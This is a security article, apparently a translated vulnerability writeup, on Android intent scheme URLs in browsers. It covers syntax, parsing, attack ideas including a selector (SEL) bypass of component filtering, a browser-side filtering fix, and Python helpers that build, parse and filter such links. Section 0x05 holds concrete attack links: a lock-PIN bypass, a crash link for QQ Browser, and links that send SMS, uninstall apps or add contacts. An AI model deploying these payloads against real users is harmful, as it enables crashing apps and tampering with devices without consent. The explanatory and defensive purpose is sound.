0x01 Android Intents with Chrome
Android has a little-known feature that lets a web page send an intent to launch an app. Previously, an app was launched from a web page by setting the src attribute of an iframe, for example:
<iframe src="paulsawesomeapp://page1"> </iframe>
This works in Chrome for Android version 18 and earlier, and in other Android browsers. The behaviour changed in Chrome for Android 25: setting the src attribute of an iframe no longer launches the app. Instead, launch the app from a user gesture on a custom-scheme link, or use the "intent:" syntax described in this article.
1.1 Basic syntax
The recommended approach is to build an intent-based link and embed it in the page so that the user can launch the app from it. This gives you more control over how the app is started, including passing additional information via intent extras. The basic syntax of the intent-based URI is as follows:
intent:
   HOST/URI-path        // Optional host
   #Intent;
      package=[string];
      action=[string];
      category=[string];
      component=[string];
      scheme=[string];
   end;
See the Android source for the full syntax.
1.2 Simple example
The example below launches the Zxing barcode scanner app using the following intent:
intent:
   //scan/
   #Intent;
      package=com.google.zxing.client.android;
      scheme=zxing;
   end;
Set it as the href attribute of an anchor:
<a href="intent://scan/#Intent;scheme=zxing;package=com.google.zxing.client.android;end"> Take a QR code </a>
The package and host are defined in Zxing's AndroidManifest.xml.
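To make the link syntax above concrete, here is an added helper (not from the Chrome documentation this section summarises) that assembles an "intent:" link from its fields. The item order it emits (scheme, action, category, type, package, component, extras) follows Android's Intent.toUri() as far as I know it; treat that ordering and the type-prefix table as assumptions. Values are percent-encoded so that ';', '=' or '#' inside an extra cannot break the item syntax.

```python
from urllib.parse import quote

# Prefix that marks the type of an extra inside the #Intent; section
# (assumed mapping: String, Boolean, int, double)
EXTRA_PREFIX = {str: "S.", bool: "B.", int: "i.", float: "d."}


def _enc(value):
    # Percent-encode everything except unreserved characters, so a value
    # containing ';', '=' or '#' stays inside its own item
    return quote(str(value), safe="")


def build_intent_uri(path="", scheme=None, package=None, action=None,
                     categories=(), mime_type=None, component=None, extras=None):
    """Return 'intent:<path>#Intent;item;...;end' for the given fields.

    path is emitted as given (e.g. '//scan/'); scheme is carried as a separate
    'scheme=' item, exactly like the Zxing example in section 1.2.
    """
    items = []
    if scheme:
        items.append("scheme=" + _enc(scheme))
    if action:
        items.append("action=" + _enc(action))
    for cat in categories:
        items.append("category=" + _enc(cat))
    if mime_type:
        items.append("type=" + _enc(mime_type))
    if package:
        items.append("package=" + _enc(package))
    if component:
        items.append("component=" + _enc(component))
    for key, value in (extras or {}).items():
        prefix = EXTRA_PREFIX[type(value)]
        # Booleans are written as 'true'/'false' to match Boolean.parseBoolean
        text = str(value).lower() if isinstance(value, bool) else value
        items.append(prefix + _enc(key) + "=" + _enc(text))
    return "intent:" + path + "#Intent;" + ";".join(items) + ";end"


if __name__ == "__main__":
    # Reproduces the Zxing link from section 1.2
    print(build_intent_uri("//scan/", scheme="zxing",
                           package="com.google.zxing.client.android"))
    # A link carrying a String and an int extra, plus a value that needs encoding
    print(build_intent_uri(action="android.intent.action.INSERT_OR_EDIT",
                           extras={"name": "magic", "phone_type": 2, "note": "a;b"}))
```

The first call reproduces the href from section 1.2 byte for byte; the second shows how the `S.` and `i.` extra prefixes from section 0x03 appear in a link and how a stray `;` in a value is neutralised by encoding.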
1.3 Precautions
If the Activity invoked by the intent accepts extras, these can be included as well. Only activities whose intent filter carries the category android.intent.category.BROWSABLE can be invoked this way, because that category indicates the application is safe to open from a browser.
1.4 See Also
Android Intents and Intent Filters
Android Activities
0x02 Use of ideas
Intent-based attacks on Android are common: they can crash applications and may escalate into permission-related vulnerabilities. Malicious samples that use intents directly are, however, easy to identify by static feature matching. A more recent variant targets Android browsers through intent scheme URLs. It exploits the lack of protection in the browser and uses the browser as a bridge to carry out an intent-based attack indirectly. Compared with an ordinary intent-based attack this is far more covert, and traditional feature matching is ineffective because the malicious code is hidden in a web page. In addition, such an attack can directly reach the browser's own components (public or private) and its private files, such as cookie files, leading to the disclosure of confidential user data.
0x03 Intent Scheme URL usage
Let's look at how an intent scheme URL is used.
<script>location.href = "intent:mydata#Intent;action=myaction;type=text/plain;end"</script>
In terms of behaviour, this is equivalent to the following Java code:
Intent intent = new Intent("myaction");
// setData() clears any type and setType() clears any data,
// so both must be set together to keep "mydata" and "text/plain"
intent.setDataAndType(Uri.parse("mydata"), "text/plain");
Let's look at an example:
The above statement is equivalent to the following Java code:
Intent intent = new Intent("myaction");
intent.setData(Uri.parse("//foobar/"));
intent.putExtra("xyz", "123");   // S.xyz: String extra
intent.putExtra("abc", 678);     // i.abc: int extra
Here the S. prefix marks a String key-value extra and the i. prefix an int key-value extra. The Android source provides the static method Intent.parseUri(String uri, int flags), which parses such a URI directly; see the official source if you want the full syntax.
0x04 Parsing and filtering of Intent scheme URIs
If a browser supports the intent scheme URI syntax, it generally handles it in three steps:
- parse the URI with Intent.parseUri to obtain the original intent object;
- apply filter rules to the intent object (policies differ between browsers and are described in detail below);
- send the intent via Context.startActivityIfNeeded or Context.startActivity.
Step 2 is the key one: if the filtering rule is missing or flawed, intent scheme URL attacks become possible.
Key function: Intent.parseUri()
Bypass: a filter that only calls Intent.setComponent(null) is not enough, because a SEL (selector intent) section can carry its own component.
0x05 WooYun cases
WooYun: QQ Browser handles intent scheme URLs improperly
WooYun: Maxthon Cloud Browser remote privacy disclosure vulnerability (requires certain conditions)
A certain browser supports these very well:
<a href="intent:#Intent;action=android.settings.SETTINGS;S.:android:show_fragment=com.android.settings.ChooseLockPassword$ChooseLockPasswordFragment;B.confirm_credentials=false;end"> Settings: bypass PIN (Android 3.0-4.3)</a>
<a href="intent:#Intent;component=com.tencent.mtt/com.tencent.mtt.debug.DbgMemWatch;end"> Crash QQ Browser</a>
<a href="intent:http://drops.wooyun.org/webview.html#Intent;component=com.android.browser/com.android.browser.BrowserActivity;end"> Open the stock browser</a>
<a href="intent:smsto:10000#Intent;action=android.intent.action.SENDTO;end"> Send SMS</a><br>
<a href="intent:#Intent;action=android.media.action.STILL_IMAGE_CAMERA;end"> Open the camera</a><br>
<a href="intent:package:org.wooyun.hiwooyun#Intent;action=android.intent.action.DELETE;end"> Uninstall an app</a><br>
<a href="intent:#Intent;action=android.intent.action.INSERT_OR_EDIT;S.name=magic;S.phone=+8610000;i.phone_type=2;type=vnd.android.cursor.item/person;end"> Add a contact</a><br>
0x06 Fix
Based on the vulnerabilities described above, a reasonably safe way to filter the intent is summarised in the following code:
// convert the intent scheme URL to an intent object
// (parseUri takes a flags argument and throws URISyntaxException on bad input)
Intent intent = Intent.parseUri(uri, Intent.URI_INTENT_SCHEME);
// forbid launching activities without the BROWSABLE category
intent.addCategory("android.intent.category.BROWSABLE");
// forbid explicit calls to a specific component
intent.setComponent(null);
// forbid an intent that carries a selector intent
intent.setSelector(null);
// start the activity with the filtered intent
context.startActivityIfNeeded(intent, -1);
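To show what Intent.parseUri (section 0x03) extracts from a link and why the filter above needs all three rules (sections 0x04 and 0x06), here is an added Python model; it is not Android code and not the page's own, only a re-implementation of the parts of the parser that this article uses (launchFlags and sourceBounds are ignored). The first two sample links are taken from sections 1.2 and 0x05; the third, with the placeholder class com.example.app/.PrivateActivity, is constructed to show a SEL section carrying its own component.

```python
from urllib.parse import unquote

BROWSABLE = "android.intent.category.BROWSABLE"

# Type prefix of an extra inside the #Intent; section -> converter for its value
EXTRA_TYPES = {
    "S.": str,                                  # String
    "B.": lambda v: v.lower() == "true",        # Boolean (Boolean.parseBoolean rules)
    "i.": int, "l.": int, "s.": int, "b.": int, # int, long, short, byte
    "f.": float, "d.": float,                   # float, double
    "c.": lambda v: v[:1],                      # char
}


def _new_intent():
    # Intent.parseUri() starts from an ACTION_VIEW intent with nothing else set
    return {"action": "android.intent.action.VIEW", "categories": set(), "type": None,
            "package": None, "component": None, "data": None, "extras": {}, "selector": None}


def parse_intent_uri(uri):
    """Parse 'intent:<data>#Intent;key=value;...;end' into a plain dict."""
    if not uri.startswith("intent:"):
        raise ValueError("not an intent: URI")
    marker = uri.rfind("#Intent;")
    if marker < 0:
        raise ValueError("missing #Intent; section")
    data = uri[len("intent:"):marker]
    base = _new_intent()
    intent = base          # items land here until a SEL item switches to the selector
    scheme = None
    for item in uri[marker + len("#Intent;"):].split(";"):
        if item == "end":
            break
        if item == "SEL":
            # everything after SEL describes a second, selector intent
            intent = _new_intent()
            base["selector"] = intent
            continue
        key, _, value = item.partition("=")
        value = unquote(value)
        if key == "action":
            intent["action"] = value
        elif key == "category":
            intent["categories"].add(value)
        elif key == "type":
            intent["type"] = value
        elif key == "package":
            intent["package"] = value
        elif key == "component":
            intent["component"] = value      # flattened "pkg/cls" form
        elif key == "scheme":
            scheme = value
        elif key[:2] in EXTRA_TYPES:
            intent["extras"][unquote(key[2:])] = EXTRA_TYPES[key[:2]](value)
        else:
            raise ValueError("unknown item: " + item)
    if data:
        # the 'scheme=' item supplies the scheme that the data part omits
        base["data"] = scheme + ":" + data if scheme else data
    return base


def apply_browser_policy(intent):
    """The section 0x06 filter: BROWSABLE only, no explicit component, no selector."""
    safe = dict(intent)
    safe["categories"] = set(intent["categories"]) | {BROWSABLE}
    safe["component"] = None   # forbid explicit calls into a chosen class
    safe["selector"] = None    # forbid a SEL section smuggling its own component
    return safe


def effective_target(intent):
    """Android resolves the selector instead of the base intent when one is set."""
    return intent["selector"] or intent


# Sample links: sections 1.2 and 0x05 of this article, plus one constructed SEL link
SAMPLES = {
    "zxing": "intent://scan/#Intent;scheme=zxing;package=com.google.zxing.client.android;end",
    "explicit": "intent:#Intent;component=com.tencent.mtt/com.tencent.mtt.debug.DbgMemWatch;end",
    "selector": "intent:#Intent;SEL;component=com.example.app/.PrivateActivity;end",  # placeholder class
}


def demo():
    """Per sample: the component actually targeted before and after the filter
    (None means the intent stays implicit and must match a BROWSABLE filter)."""
    out = {}
    for name, uri in SAMPLES.items():
        raw = parse_intent_uri(uri)
        filtered = apply_browser_policy(raw)
        out[name] = (effective_target(raw)["component"],
                     effective_target(filtered)["component"])
    return out


if __name__ == "__main__":
    for name, (before, after) in demo().items():
        print(f"{name:9s} before={before!r}  after={after!r}")
```

Running it shows the explicit-component link losing its target to setComponent(null), while the SEL link keeps its target in the selector until setSelector(null) removes it; only with both rules, plus the added BROWSABLE category, does every link end up as an implicit intent that can reach nothing but activities declared safe for the browser.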
0x07 Reference
http://www.mbsd.jp/Whitepaper/IntentScheme.pdf
http://blog.csdn.net/l173864930/article/details/36951805
Android Chrome: setting the iframe src property no longer launches the app